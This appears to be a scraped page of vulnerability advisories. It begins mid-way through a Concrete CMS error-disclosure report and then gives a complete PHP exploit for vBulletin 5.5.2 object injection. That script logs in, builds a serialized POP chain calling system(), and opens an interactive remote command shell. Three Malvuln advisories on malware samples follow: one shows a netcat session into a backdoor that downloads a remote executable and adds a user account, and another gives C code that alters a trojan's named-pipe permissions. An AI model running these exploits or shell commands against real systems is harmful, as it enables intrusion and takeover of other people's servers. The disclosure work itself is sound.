/>Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br />```<br /><br />[+] Response:<br /><br />```HTTP<br />HTTP/1.1 500 Internal Server Error<br />Date: Mon, 28 Nov 2022 15:32:22 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Connection: close<br />Content-Type: text/html;charset=UTF-8<br />Content-Length: 592153<br /><br /><!DOCTYPE html><!--<br /><br /><br />Whoops\Exception\ErrorException: include(): Failed opening<br />'C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php'<br />for inclusion (include_path='C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR')<br />in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php<br />on line 26<br />Stack trace:<br /> 1. Whoops\Exception\ErrorException->()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26<br /> 2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26<br /> 3. Stash\Driver\FileSystem\NativeEncoder->deserialize()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201<br /> 4. Stash\Driver\FileSystem->getData()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631<br /> 5. Stash\Item->getRecord()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321<br /> 6. Stash\Item->executeGet()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252<br /> 7. Stash\Item->get()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346<br /> 8. Stash\Item->isMiss()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67<br /> 9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356<br /> 10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601<br /> 11. Laminas\I18n\Translator\Translator->loadMessages()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434<br /> 12. Laminas\I18n\Translator\Translator->getTranslatedMessage()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349<br /> 13. Laminas\I18n\Translator\Translator->translate()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69<br /> 14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27<br /> 15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47<br /> 16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267<br /> 17. Concrete\Core\Block\View\BlockView->renderViewContents()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164<br /> 18. Concrete\Core\View\AbstractView->render()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853<br /> 19. Concrete\Core\Area\Area->display()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128<br /> 20. Concrete\Core\Area\GlobalArea->display()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11<br /> 21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125<br /> 22. Concrete\Core\View\View->inc()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4<br /> 23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329<br /> 24. Concrete\Core\View\View->renderTemplate()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291<br /> 25. Concrete\Core\View\View->renderViewContents()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164<br /> 26. Concrete\Core\View\AbstractView->render()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19<br /> 27. Concrete\Controller\SinglePage\PageNotFound->view()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318<br /> 28. call_user_func_array()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318<br /> 29. Concrete\Core\Controller\AbstractController->runAction()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188<br /> 30. Concrete\Core\Http\ResponseFactory->controller()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95<br /> 31. Concrete\Core\Http\ResponseFactory->notFound()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390<br /> 32. Concrete\Core\Http\ResponseFactory->collectionNotFound()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234<br /> 33. Concrete\Core\Http\ResponseFactory->collection()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132<br /> 34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60<br /> 35. Concrete\Core\Http\DefaultDispatcher->dispatch()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39<br /> 36. Concrete\Core\Http\Middleware\DispatcherDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39<br /> 37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50<br /> 38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36<br /> 39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50<br /> 40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36<br /> 41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50<br /> 42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35<br /> 43. Concrete\Core\Http\Middleware\CookieMiddleware->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50<br /> 44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29<br /> 45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50<br /> 46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86<br /> 47. Concrete\Core\Http\Middleware\MiddlewareStack->process()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85<br /> 48. Concrete\Core\Http\DefaultServer->handleRequest()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125<br /> 49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102<br /> 50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()<br />C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45<br /> 51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2<br /><br /><br />--><html><br /> <head><br /> <meta charset="utf-8"><br /> <meta name="robots" content="noindex,nofollow"/><br /> <meta name="viewport" content="width=device-width,<br />initial-scale=1, shrink-to-fit=no"/><br /> <title>Concrete CMS has encountered an issue.</title><br /><br /> <style>body {<br /> font: 12px "Helvetica Neue", helvetica, arial, sans-serif;<br /> color: #131313;<br /> background: #eeeeee;<br /> padding:0;<br /> margin: 0;<br /> max-height: 100%;<br /><br /> text-rendering: optimizeLegibility;<br />}<br /> a {<br /> text-decoration: none;<br /> }<br /><br />.Whoops.container {<br /> position: relative;<br /> z-index: 9999999999;<br />}<br /><br />.panel {<br /> overflow-y: scroll;<br /> height: 100%;<br /> position: fixed;<br /> margin: 0;<br /> left: 0;<br /> top: 0;<br />}<br /><br />.branding {<br /> position: absolute;<br /> top: 10px;<br /> right: 20px;<br /> color: #777777;<br /> font-size: 10px;<br /> z-index: 100;<br />}<br /> .branding a {<br /> color: #e95353;<br /> }<br /><br />header {<br /> color: white;<br /> box-sizing: border-box;<br /> background-color: #2a2a2a;<br /> padding: 35px 40px;<br /> max-height: 180px;<br /> overflow: hidden;<br /> transition: 0.5s;<br />}<br /><br /> header.header-expand {<br /> max-height: 1000px;<br /> }<br /><br /> .exc-title {<br /> margin: 0;<br /> color: #bebebe;<br /> font-size: 14px;<br /> }<br /> .exc-title-primary, .exc-title-secondary {<br /> color: #e95353;<br /> }<br /><br /> .exc-message {<br /> font-size: 20px;<br /> word-wrap: break-word;<br /> margin: 4px 0 0 0;<br /> color: white;<br /> }<br /> .exc-message span {<br /> display: block;<br /> }<br /> .exc-message-empty-notice {<br /> color: #a29d9d;<br /> font-weight: 300;<br /> }<br /><br />.......<br /><br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/4f60ka)<br /><br />## Time spent<br />`03:00:00`<br /><br /><br /></code></pre>
<pre><code><?php<br /><br />/*<br /> --------------------------------------------------------------<br /> vBulletin <= 5.5.2 (movepm) PHP Object Injection Vulnerability<br /> --------------------------------------------------------------<br /> <br /> author..............: Egidio Romano aka EgiX<br /> mail................: n0b0d13s[at]gmail[dot]com<br /> software link.......: https://www.vbulletin.com<br /> <br /> +-------------------------------------------------------------------------+<br /> | This proof of concept code was written for educational purpose only. |<br /> | Use it at your own risk. Author will be not responsible for any damage. |<br /> +-------------------------------------------------------------------------+<br /> <br /> [-] Vulnerability Description:<br /> <br /> User input passed through the "messageids" request parameter to /ajax/api/vb4_private/movepm is<br /> not properly sanitized before being used in a call to the unserialize() PHP function. This can<br /> be exploited by malicious users to inject arbitrary PHP objects into the application scope,<br /> allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.<br /> <br /> [-] Technical writeup:<br /><br /> http://karmainsecurity.com/exploiting-an-nday-vbulletin-php-object-injection<br />*/<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[+] cURL extension required!\n");<br /><br />print "+------------------------------------------------------------------+";<br />print "\n| vBulletin <= 5.5.2 (movepm) PHP Object Injection Exploit by EgiX |";<br />print "\n+------------------------------------------------------------------+\n";<br /><br />if ($argc != 4)<br />{<br /> print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";<br /> print "\nExample....: php $argv[0] http://localhost/vb/ user passwd";<br /> print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n";<br /> die();<br />}<br /><br />class googlelogin_vendor_autoload {} // fake class to include the autoloader<br /><br />class GuzzleHttp_HandlerStack<br />{<br /> private $handler, $stack;<br /> <br /> function __construct($cmd)<br /> {<br /> $this->stack = [["system"]]; // the callback we want to execute<br /> $this->handler = $cmd; // argument for the callback<br /> }<br />}<br /><br />class GuzzleHttp_Psr7_FnStream<br />{<br /> function __construct($callback)<br /> {<br /> $this->_fn_close = $callback;<br /> }<br />}<br /><br />function make_popchain($cmd)<br />{<br /> $pop = new GuzzleHttp_HandlerStack($cmd);<br /> $pop = new GuzzleHttp_Psr7_FnStream([$pop, 'resolve']);<br /><br /> $chain = serialize([new googlelogin_vendor_autoload, $pop]);<br /><br /> $chain = str_replace(['s:', chr(0)], ['S:', '\00'], $chain);<br /> $chain = str_replace('GuzzleHttp_HandlerStack', 'GuzzleHttp\HandlerStack', $chain);<br /> $chain = str_replace('GuzzleHttp_Psr7_FnStream', 'GuzzleHttp\Psr7\FnStream', $chain);<br /> $chain = str_replace('0GuzzleHttp\HandlerStack', '0GuzzleHttp\5CHandlerStack', $chain);<br /> <br /> return $chain;<br />}<br /><br />list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];<br /><br />$ch = curl_init();<br /><br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_HEADER, true);<br /><br />print "[+] Logging in with username '{$user}' and password '{$pass}'\n";<br /><br />curl_setopt($ch, CURLOPT_URL, $url);<br /><br />if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Session ID not found!\n");<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");<br />curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");<br /><br />if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Login failed!\n");<br /><br />print "[+] Logged-in! Retrieving security token\n";<br /><br />curl_setopt($ch, CURLOPT_URL, $url);<br />curl_setopt($ch, CURLOPT_POST, false);<br />curl_setopt($ch, CURLOPT_HEADER, false);<br />curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);<br /><br />if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[+] Security token not found!\n");<br /><br />$params = ["routestring" => "ajax/api/vb4_private/movepm",<br /> "securitytoken" => $token[1],<br /> "folderid" => 1];<br /><br />print "[+] Launching shell\n";<br /><br />while(1)<br />{<br /> print "\nvb-shell# ";<br /> if (($cmd = trim(fgets(STDIN))) == "exit") break;<br /> $params["messageids"] = make_popchain($cmd);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));<br /> preg_match('/(.*){"response":/s', curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");<br />}<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/4262a8b52b902aa2e6bf02a156d1b8d4.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Backdoor.Win32.Autocrat.b<br />Vulnerability: Weak Hardcoded Credentials<br />Description: The malware is packed with PeCompact, listens on TCP port 8536 and requires authentication. However, the password "autocrat" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.<br />Family: Autocrat<br />Type: PE32<br />MD5: 4262a8b52b902aa2e6bf02a156d1b8d4<br />Vuln ID: MVID-2022-0660<br />Dropped files: srvsupp.exe<br />Disclosure: 11/24/2022<br /><br /><br />Exploit/PoC:<br />C:\Users\gg\Desktop>nc64.exe x.x.x.x 8536<br />Login:autocrat<br /><br />WinShell v5.0 (C)2002 janker.org<br /><br />? for help<br />CMD>?<br /><br />i Install<br />r Remove<br />p Path<br />b reBoot<br />d shutDown<br />s Shell<br />x eXit<br />q Quit<br /><br />Download:<br />CMD>http://.../srv.exe<br /><br />? for help<br />CMD>s<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\Users\Victim\Desktop>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\Users\Victim\Desktop>net user apparitionsec 666 /add<br />net user apparitionsec 666 /add<br />The command completed successfully.<br /><br /><br />C:\Users\Victim\Desktop><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/99e55ce93392068c970384ab24a0e13d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Win32.Ransom.Conti<br />Vulnerability: Crypto Logic Flaw<br />Description: Conti ransomware FAILS to encrypt non PE files that have a ".exe" in the filename. Creating specially crafted file names successfully evaded encryption for this malware sample, others variants are unknown as they were not yet tested.<br /><br />E.g. <br /><br />Test.exe.docx<br />Test.exe.pdf<br /><br />Tested successfully in a virtual machine environment.<br /><br />Family: Conti<br />Type: PE32<br />MD5: 99e55ce93392068c970384ab24a0e13d<br />Vuln ID: MVID-2022-0662<br />Disclosure: 11/25/2022<br /><br />Video PoC URL:<br />https://www.youtube.com/watch?v=rjxCII_e6xQ<br /><br />Exploit/PoC:<br />Create files with ".exe" within the filename.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/d891c9374ccb2a4cae2274170e8644d8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Trojan.Win32.DarkNeuron.gen<br />Vulnerability: Named Pipe Null DACL<br />Family: DarkNeuron (Turla Group)<br />Type: PE32<br />MD5: d891c9374ccb2a4cae2274170e8644d8<br />Vuln ID: MVID-2022-0661<br />Disclosure: 11/24/2022<br />Description: The malware process "NCSC.exe" creates an IPC pipe with a NULL DACL allowing RW for the Everyone user group.<br /><br />\\.\Pipe\Winsock2\baseapi_http<br /> RW Everyone<br /> RW BUILTIN\Administrators<br /><br />Local low privileged users can modify the DACL to remove rights for the Everyone users group, denying access to use the pipe for further RW interprocess communications.<br /><br />Exploit/PoC:<br />#include "windows.h"<br />#include "stdio.h"<br />#include "accctrl.h"<br />#include "aclapi.h"<br /><br />/*<br />Trojan.Win32.DarkNeuron.gen (Turla Group) NCSC.exe<br />MD5: d891c9374ccb2a4cae2274170e8644d8<br />NamedPipe Exploit Deny Access to Everyone<br />By Malvuln <br />Nov of 2022<br />**/<br /><br />#define VULN_TROJAN_PIPE "\\\\.\\pipe\\Winsock2\\baseapi_http"<br /><br />int main(void){<br /><br /> HANDLE hPipe = CreateFileA((LPCSTR)VULN_TROJAN_PIPE, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, NULL, NULL);<br /> PACL pOldDACL = NULL;<br /> PACL pNewDACL = NULL;<br /> <br />if (hPipe == INVALID_HANDLE_VALUE){ <br /> printf("%d", GetLastError()); <br /> return 1;<br />}<br /> <br /> if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){<br /> printf("%d", GetLastError());<br /> return 1;<br /> }<br /> <br /> TRUSTEE trustee[1];<br /> trustee[0].TrusteeForm = TRUSTEE_IS_NAME;<br /> trustee[0].TrusteeType = TRUSTEE_IS_GROUP;<br /> trustee[0].ptstrName = TEXT("Everyone");<br /> trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;<br /> trustee[0].pMultipleTrustee = NULL;<br /><br /> EXPLICIT_ACCESS explicit_access_list[1];<br /> ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));<br /><br /> explicit_access_list[0].grfAccessMode = DENY_ACCESS; <br /> explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;<br /> explicit_access_list[0].grfInheritance = NO_INHERITANCE;<br /> explicit_access_list[0].Trustee = trustee[0];<br /> <br /> if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){<br /> printf("%d", GetLastError());<br /> return 1;<br /> }<br /> <br /> if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ <br /> printf("%d", GetLastError());<br /> return 1; <br /> }else{<br /> printf("Trojan.Win32.DarkNeuron.gen (Turla Group) PWNED!\n");<br /> printf("By Malvuln\n");<br /> printf("Nov of 2022\n");<br /> }<br /> <br /> LocalFree(pNewDACL);<br /> LocalFree(pOldDACL);<br /> CloseHandle(hPipe);<br /><br /> system("pause");<br /><br />return 0;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>